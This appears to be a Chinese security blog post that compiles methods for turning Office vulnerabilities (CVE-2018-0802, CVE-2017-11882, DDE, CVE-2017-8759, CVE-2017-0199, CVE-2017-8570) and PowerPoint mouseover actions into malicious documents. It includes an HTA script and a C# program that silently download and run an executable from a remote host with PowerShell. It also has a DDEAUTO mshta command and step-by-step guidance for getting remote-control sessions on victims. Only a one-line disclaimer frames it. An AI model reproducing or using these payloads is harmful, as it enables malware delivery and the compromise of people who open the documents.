Office漏洞利用大全

最近office又爆出漏洞CVE-2018-0802,身为地地道道的中国人岂能不凑热闹。之前又看到了不少类似的文章,我就把近期比较好玩的有关office的漏洞利用姿势做个合集!

参考链接:

CVE-2018-0802

https://github.com/Ridter/RTF_11882_0802

https://github.com/rxwx/CVE-2018-0802

http://www.freebuf.com/vuls/159789.html

https://evi1cg.me/archives/CVE_2018_0802.html

CVE-2017-11882

https://github.com/Ridter/CVE-2017-11882

https://evi1cg.me/archives/CVE_2017_11882_exp.html

http://www.freebuf.com/vuls/154462.html

DDE

http://www.freebuf.com/articles/system/153105.html

http://www.freebuf.com/articles/terminal/150285.html

http://bobao.360.cn/learning/detail/4592.html

CVE-2017-8759

https://github.com/vysec/CVE-2017-8759

https://bbs.77169.com/forum.php?mod=viewthread&tid=364738

CVE-2017-0199

http://www.91ri.org/16953.html

CVE-2017-8570

http://www.freebuf.com/vuls/144054.html

https://github.com/tezukanice/Office8570

Koadic

https://github.com/zerosum0x0/koadic

Empire

https://github.com/EmpireProject/Empire

 

1.我们先看最新的CVE-2018-0802漏洞

大佬的脚本基本都很齐全了,我做一下补充。丢弃kali,用远控来实现。

不言而喻,-I test.rtf来加入CVE-2018-0802的漏洞文档,-c "cmd.exe /c calc.exe"来加入CVE-2017-11882的执行命令。

在这里

https://www.demmsec.co.uk/2018/01/exploiting-fully-patched-office-2016-using-cve-2018-0802/

说明了一种CVE-2018-0802powershell代码的植入方式。然后编译为exe文件,

https://github.com/rxwx/CVE-2018-0802

packager_exec_CVE - 2018 - 0802. py - e executable_path - o output_file_name

生成CVE-2018-0802的漏洞文档。

我们修改一下,在上次CVE-2017-11882的漏洞利用中我们用到了远控上线,当时的HTA代码如下:

[sourcecode language="plain"]
Sub window_onload
window.resizeTo 0,0
window.MoveTo -100,-100
const impersonation = 3
Const HIDDEN_WINDOW = 12
Set Locator = CreateObject("WScript.Shell")
Locator.Run"powershell.exe -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.201/office.exe', $env:APPDATA + '\office.exe'); Start-Process $env:APPDATA'\office.exe'",0,FALSE
window.close()
end sub
[/sourcecode]

我们将powershell的下载地址替换Empire的代码即可,那么我们的cs文件

[sourcecode language="plain"]
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace shell
{
class Program
{
static void Main(string[] args)
{
string strCmdText;
strCmdText = "powershell -nop -w hidden -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.201/office.exe', $env:APPDATA + '\office.exe'); Start-Process $env:APPDATA'\office.exe'";
System.Diagnostics.Process.Start("powershell.exe",strCmdText);
}
}
}
[/sourcecode]

我们用csc编辑成exe发现报错,把文件路径换成\\

完成

我们测试exe文件是否可以正常打开上线!没有问题!

最后我们就把CVE-2018-0802和CVE-2017-11882漏洞利用文档综合到一起即可!

 

 

 

 

2.CVE-2017-11882漏洞,首先使用大宝剑建立链接

PS:大宝剑获取非英文版系统的shell会有报错

UnicodeDecodeError: ‘ascii’ codec can’t decode byte 0xe5 in position 108: ordinal not in ran

解决办法就是在koadic文件中增加utf-8编码

之后使用exp脚本生成文档

复制测试!获得会话!!

宿主进程状态

 

 

 

 

3.office的DDE应该不用多说了吧,直接开搞

新建word文档,按下CTRL+F9

在其中插入

DDEAUTO c:\\windows\\system32\\cmd.exe “/k mshta http://192.168.188.147:66/LaLHL”

保存即可!然后打开测试!

获得会话!

宿主进程状态

更多姿势:http://bobao.360.cn/learning/detail/4592.html

 

 

 

 

4.CVE-2017-8759的复现,这个漏洞本身是.NET的问题……话不说直接开干!

在kali中使用Empire生成HTA后门

修改exploit.txt文件

开启apache或者使用python -m SimpleHTTPServer建立链接

并且把HTA上传到同一路径下。

然后使用word新建一个rtf,插入一个链接到文件的对象http://192.168.1.118:808/exploit.txt

然后使用C32编辑blob.bin,修改位置如下

右键拷贝HEX格式所有,使用编辑器打开rtf文件替换代码

再将objautlink前插入objupdate

保存修改后我们测试一下效果!

(o゜▽゜)o☆[BINGO!]

 

 

 

 

5.CVE-2017-0199的话就更简单了…

下载漏洞利用脚本

wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb

然后移动rb脚本到/usr/share/metasploit-framework/modules/exploits/windows/fileformat,然后打开msf生成hta文件链接

然后使用刚才下载的exp设置参数

Run后复制文件到靶机测试

查看会话

 

 

 

 

6.CVE-2017-8570同样还是一梭子搞定!

使用脚本生成恶意ppsx文件

使用msfvenom生成exe后门

再次使用脚本建立链接

打开msf建立监听

复制文件测试!获得会话!!

 

 

 

最后再普及一个姿势!

无需加载宏之PPTX钓鱼

首先新建一个PPT,插入内容

勾选文字插入动作

鼠标移过时的动作,选择运行程序

这里咱们插入一段powershell代码

之后把它插入到运行程序选项框里

确定保存就可以了,咱们测试一下。

当鼠标滑过…

(o゜▽゜)o☆[BINGO!]

 

PS:也可将动作插入到形状里面的空白动作按钮

然后覆盖全屏,并设置无线条无填充

攻防无绝对,技术无黑白

技术仅供测试使用,请勿用做非法用途!

本文由 华盟网 作者:AlexFrankly 发表,其版权均为 华盟网 所有,文章内容系作者个人观点,不代表 华盟网 对观点赞同或支持。如需转载,请注明文章来源。

0

发表评论

// 360自动收录 // 360自动收录